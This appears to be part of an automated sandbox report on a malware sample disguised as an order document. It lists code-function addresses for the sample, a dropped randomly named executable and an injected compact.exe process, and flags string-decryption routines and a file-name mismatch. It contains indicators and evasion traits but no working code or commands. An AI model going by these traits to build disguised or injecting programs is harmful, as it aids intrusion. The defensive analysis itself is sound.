Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0042DAB3	5_2_0042DAB3
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00416B61	5_2_00416B61
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00416B63	5_2_00416B63
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00402460	5_2_00402460
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00410433	5_2_00410433
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0040E4B3	5_2_0040E4B3
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_00402660	5_2_00402660
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0040E68E	5_2_0040E68E
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01448158	5_2_01448158
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013B0100	5_2_013B0100
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0145A118	5_2_0145A118
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014781CC	5_2_014781CC
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014801AA	5_2_014801AA
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014741A2	5_2_014741A2
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01452000	5_2_01452000
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147A352	5_2_0147A352
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014803E6	5_2_014803E6
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013CE3F0	5_2_013CE3F0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01460274	5_2_01460274
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014402C0	5_2_014402C0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C0535	5_2_013C0535
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01480591	5_2_01480591
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01472446	5_2_01472446
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01464420	5_2_01464420
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0146E4F6	5_2_0146E4F6
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C0770	5_2_013C0770
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013E4750	5_2_013E4750
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013BC7C0	5_2_013BC7C0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013DC6E0	5_2_013DC6E0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013D6962	5_2_013D6962
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C29A0	5_2_013C29A0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0148A9A6	5_2_0148A9A6
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C2840	5_2_013C2840
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013CA840	5_2_013CA840
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013A68B8	5_2_013A68B8
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013EE8F0	5_2_013EE8F0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147AB40	5_2_0147AB40
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01476BD7	5_2_01476BD7
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013BEA80	5_2_013BEA80
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013CAD00	5_2_013CAD00
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0145CD1F	5_2_0145CD1F
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013D8DBF	5_2_013D8DBF
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013BADE0	5_2_013BADE0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C0C00	5_2_013C0C00
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013B0CF2	5_2_013B0CF2
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01460CB5	5_2_01460CB5
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01434F40	5_2_01434F40
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013E0F30	5_2_013E0F30
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01402F28	5_2_01402F28
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01462F30	5_2_01462F30
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013CCFE0	5_2_013CCFE0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0143EFA0	5_2_0143EFA0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013B2FC8	5_2_013B2FC8
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147EE26	5_2_0147EE26
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C0E59	5_2_013C0E59
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147EEDB	5_2_0147EEDB
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013D2E90	5_2_013D2E90
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147CE93	5_2_0147CE93
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0148B16B	5_2_0148B16B
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013AF172	5_2_013AF172
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013F516C	5_2_013F516C
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013CB1B0	5_2_013CB1B0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0146F0CC	5_2_0146F0CC
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147F0E0	5_2_0147F0E0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014770E9	5_2_014770E9
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C70C0	5_2_013C70C0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147132D	5_2_0147132D
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013AD34C	5_2_013AD34C
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0140739A	5_2_0140739A
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C52A0	5_2_013C52A0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014612ED	5_2_014612ED
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013DB2C0	5_2_013DB2C0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01477571	5_2_01477571
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0145D5B0	5_2_0145D5B0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013B1460	5_2_013B1460
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147F43F	5_2_0147F43F
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147F7B0	5_2_0147F7B0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01405630	5_2_01405630
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_014716CC	5_2_014716CC
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01455910	5_2_01455910
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C9950	5_2_013C9950
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013DB950	5_2_013DB950
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0142D800	5_2_0142D800
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C38E0	5_2_013C38E0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147FB76	5_2_0147FB76
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01435BF0	5_2_01435BF0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013DFB80	5_2_013DFB80
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013FDBF9	5_2_013FDBF9
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01477A46	5_2_01477A46
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147FA49	5_2_0147FA49
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01433A6C	5_2_01433A6C
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0146DAC6	5_2_0146DAC6
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01405AA0	5_2_01405AA0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01461AA3	5_2_01461AA3
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0145DAAC	5_2_0145DAAC
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01471D5A	5_2_01471D5A
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01477D73	5_2_01477D73
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C3D40	5_2_013C3D40
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013DFDC0	5_2_013DFDC0
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01439C32	5_2_01439C32
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147FCF2	5_2_0147FCF2
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147FF09	5_2_0147FF09
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C1F92	5_2_013C1F92
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01383FD2	5_2_01383FD2
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_01383FD5	5_2_01383FD5
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_0147FFB1	5_2_0147FFB1
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: 5_2_013C9EB0	5_2_013C9EB0
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04077025	9_2_04077025
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04078DD9	9_2_04078DD9
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04078DE2	9_2_04078DE2
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04096682	9_2_04096682
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_0407F732	9_2_0407F732
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_0407F730	9_2_0407F730
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04079002	9_2_04079002
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_04077082	9_2_04077082
Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe	Code function: 9_2_0407725D	9_2_0407725D
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368A352	10_2_0368A352
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036903E6	10_2_036903E6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035DE3F0	10_2_035DE3F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03670274	10_2_03670274
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036502C0	10_2_036502C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03658158	10_2_03658158
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035C0100	10_2_035C0100
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0366A118	10_2_0366A118
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036881CC	10_2_036881CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036901AA	10_2_036901AA
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03662000	10_2_03662000
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035F4750	10_2_035F4750
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D0770	10_2_035D0770
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035CC7C0	10_2_035CC7C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035EC6E0	10_2_035EC6E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D0535	10_2_035D0535
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03690591	10_2_03690591
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03682446	10_2_03682446
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03674420	10_2_03674420
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0367E4F6	10_2_0367E4F6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368AB40	10_2_0368AB40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03686BD7	10_2_03686BD7
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035CEA80	10_2_035CEA80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035E6962	10_2_035E6962
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0369A9A6	10_2_0369A9A6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D29A0	10_2_035D29A0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035DA840	10_2_035DA840
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D2840	10_2_035D2840
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035FE8F0	10_2_035FE8F0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035B68B8	10_2_035B68B8
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03644F40	10_2_03644F40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03612F28	10_2_03612F28
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03672F30	10_2_03672F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035F0F30	10_2_035F0F30
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035C2FC8	10_2_035C2FC8
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035DCFE0	10_2_035DCFE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0364EFA0	10_2_0364EFA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D0E59	10_2_035D0E59
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368EE26	10_2_0368EE26
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368EEDB	10_2_0368EEDB
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035E2E90	10_2_035E2E90
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368CE93	10_2_0368CE93
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035DAD00	10_2_035DAD00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0366CD1F	10_2_0366CD1F
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035CADE0	10_2_035CADE0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035E8DBF	10_2_035E8DBF
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D0C00	10_2_035D0C00
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035C0CF2	10_2_035C0CF2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03670CB5	10_2_03670CB5
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035BD34C	10_2_035BD34C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368132D	10_2_0368132D
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0361739A	10_2_0361739A
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036712ED	10_2_036712ED
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035EB2C0	10_2_035EB2C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D52A0	10_2_035D52A0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0369B16B	10_2_0369B16B
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0360516C	10_2_0360516C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035BF172	10_2_035BF172
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035DB1B0	10_2_035DB1B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036870E9	10_2_036870E9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368F0E0	10_2_0368F0E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D70C0	10_2_035D70C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0367F0CC	10_2_0367F0CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368F7B0	10_2_0368F7B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_036816CC	10_2_036816CC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03687571	10_2_03687571
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0366D5B0	10_2_0366D5B0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035C1460	10_2_035C1460
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368F43F	10_2_0368F43F
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368FB76	10_2_0368FB76
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03645BF0	10_2_03645BF0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0360DBF9	10_2_0360DBF9
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035EFB80	10_2_035EFB80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03643A6C	10_2_03643A6C
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368FA49	10_2_0368FA49
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03687A46	10_2_03687A46
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0367DAC6	10_2_0367DAC6
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03615AA0	10_2_03615AA0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03671AA3	10_2_03671AA3
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0366DAAC	10_2_0366DAAC
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D9950	10_2_035D9950
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035EB950	10_2_035EB950
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03665910	10_2_03665910
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0363D800	10_2_0363D800
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D38E0	10_2_035D38E0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368FF09	10_2_0368FF09
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D1F92	10_2_035D1F92
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368FFB1	10_2_0368FFB1
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D9EB0	10_2_035D9EB0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03687D73	10_2_03687D73
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035D3D40	10_2_035D3D40
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03681D5A	10_2_03681D5A
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_035EFDC0	10_2_035EFDC0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_03649C32	10_2_03649C32
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_0368FCF2	10_2_0368FCF2
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E21C80	10_2_02E21C80
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E3A710	10_2_02E3A710
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E1CE67	10_2_02E1CE67
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E1CE70	10_2_02E1CE70
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E1B2EB	10_2_02E1B2EB
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E1D090	10_2_02E1D090
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E1B110	10_2_02E1B110
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E237C0	10_2_02E237C0
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_02E237BE	10_2_02E237BE
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_034EA275	10_2_034EA275
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_034EB018	10_2_034EB018
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_034EBAF4	10_2_034EBAF4
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_034EBFAD	10_2_034EBFAD
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_034EBD7B	10_2_034EBD7B
Source: C:\Windows\SysWOW64\compact.exe	Code function: 10_2_034EBC15	10_2_034EBC15

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 03617E54 appears 102 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 035BB970 appears 278 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 0364F290 appears 105 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 03605130 appears 58 times
Source: C:\Windows\SysWOW64\compact.exe	Code function: String function: 0363EA12 appears 86 times
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: String function: 01407E54 appears 102 times
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: String function: 013F5130 appears 58 times
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: String function: 0142EA12 appears 86 times
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: String function: 0143F290 appears 105 times
Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Code function: String function: 013AB970 appears 280 times

Sample file is different than original file name gathered from version info

Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2118662660.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
